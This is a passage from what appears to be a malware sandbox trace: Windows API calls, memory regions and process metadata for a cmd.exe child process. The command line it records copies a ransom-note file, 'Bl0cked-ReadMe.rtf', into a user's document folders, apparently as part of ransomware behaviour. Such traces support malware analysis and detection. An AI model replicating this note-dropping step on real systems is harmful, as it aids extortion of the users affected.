out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0142.618] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x22eaa4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x22eaa4*=0x1a) returned 1 [0142.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.618] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.618] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.618] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.618] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.618] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.618] SetConsoleInputExeNameW () returned 0x1 [0142.618] GetConsoleOutputCP () returned 0x1b5 [0142.618] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.618] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.619] exit (_Code=0) Process: id = "166" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xec0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14812 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 
region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14813 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14814 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14815 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 14816 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14817 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14818 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14819 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14820 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14821 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15618 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15619 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 
15620 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15621 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 15622 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 15623 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15624 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15625 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15626 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15627 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15628 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15629 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = 
"usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15630 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15631 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15632 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 15633 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15634 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15635 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15636 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 15637 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 15638 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 15639 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 15640 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" 
filename = "" Region: id = 15641 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Thread: id = 223 os_tid = 0xf20 [0140.318] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fbb4 | out: lpSystemTimeAsFileTime=0x28fbb4*(dwLowDateTime=0x8d92a660, dwHighDateTime=0x1d440a9)) [0140.318] GetCurrentProcessId () returned 0xec0 [0140.318] GetCurrentThreadId () returned 0xf20 [0140.318] GetTickCount () returned 0x2c10d [0140.318] QueryPerformanceCounter (in: lpPerformanceCount=0x28fbac | out: lpPerformanceCount=0x28fbac*=19710746904) returned 1 [0140.319] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.319] __set_app_type (_Type=0x1) [0140.319] __p__fmode () returned 0x76b331f4 [0140.319] __p__commode () returned 0x76b331fc [0140.319] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.319] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.319] GetCurrentThreadId () returned 0xf20 [0140.320] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf20) returned 0x38 [0140.320] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.320] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.320] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.320] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.320] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fb44 | out: phkResult=0x28fb44*=0x0) returned 0x2 [0140.320] VirtualQuery (in: lpAddress=0x28fb7b, lpBuffer=0x28fb14, dwLength=0x1c | out: lpBuffer=0x28fb14*(BaseAddress=0x28f000, AllocationBase=0x190000, 
AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.320] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fb14, dwLength=0x1c | out: lpBuffer=0x28fb14*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.320] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fb14, dwLength=0x1c | out: lpBuffer=0x28fb14*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.320] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fb14, dwLength=0x1c | out: lpBuffer=0x28fb14*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.320] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fb14, dwLength=0x1c | out: lpBuffer=0x28fb14*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.320] GetConsoleOutputCP () returned 0x1b5 [0140.320] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.321] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.321] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.321] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.321] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.321] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.321] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.321] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.324] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.324] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.324] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.324] SetConsoleMode 
(hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.324] GetEnvironmentStringsW () returned 0x4001b8* [0140.325] FreeEnvironmentStringsW (penv=0x4001b8) returned 1 [0140.325] GetEnvironmentStringsW () returned 0x4001b8* [0140.325] FreeEnvironmentStringsW (penv=0x4001b8) returned 1 [0140.325] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28eab4 | out: phkResult=0x28eab4*=0x40) returned 0x0 [0140.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x0, lpData=0x28eac0*=0xf0, lpcbData=0x28eab8*=0x1000) returned 0x2 [0140.325] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x4, lpData=0x28eac0*=0x1, lpcbData=0x28eab8*=0x4) returned 0x0 [0140.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x0, lpData=0x28eac0*=0x1, lpcbData=0x28eab8*=0x1000) returned 0x2 [0140.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x4, lpData=0x28eac0*=0x0, lpcbData=0x28eab8*=0x4) returned 0x0 [0140.325] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x4, lpData=0x28eac0*=0x40, lpcbData=0x28eab8*=0x4) returned 0x0 [0140.325] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x4, lpData=0x28eac0*=0x40, lpcbData=0x28eab8*=0x4) returned 0x0 [0140.325] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", 
lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x0, lpData=0x28eac0*=0x40, lpcbData=0x28eab8*=0x1000) returned 0x2 [0140.325] RegCloseKey (hKey=0x40) returned 0x0 [0140.325] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28eab4 | out: phkResult=0x28eab4*=0x40) returned 0x0 [0140.325] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x0, lpData=0x28eac0*=0x40, lpcbData=0x28eab8*=0x1000) returned 0x2 [0140.326] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x4, lpData=0x28eac0*=0x1, lpcbData=0x28eab8*=0x4) returned 0x0 [0140.326] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x0, lpData=0x28eac0*=0x1, lpcbData=0x28eab8*=0x1000) returned 0x2 [0140.326] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x4, lpData=0x28eac0*=0x0, lpcbData=0x28eab8*=0x4) returned 0x0 [0140.326] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x4, lpData=0x28eac0*=0x9, lpcbData=0x28eab8*=0x4) returned 0x0 [0140.326] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x4, lpData=0x28eac0*=0x9, lpcbData=0x28eab8*=0x4) returned 0x0 [0140.326] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28eabc, lpData=0x28eac0, 
lpcbData=0x28eab8*=0x1000 | out: lpType=0x28eabc*=0x0, lpData=0x28eac0*=0x9, lpcbData=0x28eab8*=0x1000) returned 0x2 [0140.326] RegCloseKey (hKey=0x40) returned 0x0 [0140.326] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636e [0140.326] srand (_Seed=0x5b88636e) [0140.326] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" [0140.326] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf\"" [0140.326] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.326] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x401918, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.327] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.327] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.327] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.327] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.327] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.327] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.327] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.327] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.327] _wcsicmp (_String1="PROMPT", 
_String2="TIME") returned -4 [0140.327] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.327] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.327] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.327] GetEnvironmentStringsW () returned 0x402308* [0140.327] FreeEnvironmentStringsW (penv=0x402308) returned 1 [0140.327] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.327] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.327] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.327] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.327] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.327] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.327] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.327] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.328] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.328] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.328] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f880 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.328] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f880, lpFilePart=0x28f87c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f87c*="Desktop") returned 0x18 [0140.328] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.328] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f5fc | out: lpFindFileData=0x28f5fc) returned 0x400048 [0140.328] FindClose (in: hFindFile=0x400048 | out: hFindFile=0x400048) returned 1 [0140.328] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f5fc | out: lpFindFileData=0x28f5fc) returned 0x400048 [0140.328] FindClose (in: hFindFile=0x400048 | out: hFindFile=0x400048) returned 1 [0140.328] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f5fc | out: lpFindFileData=0x28f5fc) returned 0x400048 [0140.329] FindClose (in: hFindFile=0x400048 | out: hFindFile=0x400048) returned 1 [0140.329] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.329] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.329] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.329] GetEnvironmentStringsW () returned 0x402b28* [0140.329] FreeEnvironmentStringsW (penv=0x402b28) returned 1 [0140.329] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.330] GetConsoleOutputCP () returned 0x1b5 [0140.330] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.330] GetUserDefaultLCID () returned 0x409 [0140.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f9c0, cchData=128 | out: lpLCData="0") returned 2 [0140.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f9c0, cchData=128 | out: lpLCData="0") returned 2 [0140.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f9c0, cchData=128 | out: lpLCData="1") returned 2 [0140.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.330] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.330] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.331] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.331] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.331] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.331] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.331] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.331] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.331] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.331] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.332] GetConsoleTitleW (in: lpConsoleTitle=0x3f0908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.332] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.332] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.332] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.332] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.335] _wcsicmp (_String1="type", _String2=")") returned 75 [0140.335] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0140.335] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0140.335] _wcsicmp (_String1="IF", _String2="type") returned -11 [0140.335] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0140.335] _wcsicmp (_String1="REM", _String2="type") returned -2 [0140.335] _wcsicmp (_String1="REM/?", 
_String2="type") returned -2 [0140.340] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.340] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.340] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.340] GetFileType (hFile=0x7) returned 0x2 [0140.892] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.892] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f8b8 | out: lpMode=0x28f8b8) returned 1 [0140.892] _dup (_FileHandle=1) returned 3 [0140.892] _close (_FileHandle=1) returned 0 [0140.892] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0140.893] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x28f888, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0140.894] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0140.894] GetConsoleTitleW (in: lpConsoleTitle=0x28f6b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.895] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0140.895] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0140.895] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0140.895] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0140.896] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.896] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x28f21c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28f21c) returned 0x3f0eb8 [0140.896] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0140.896] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") 
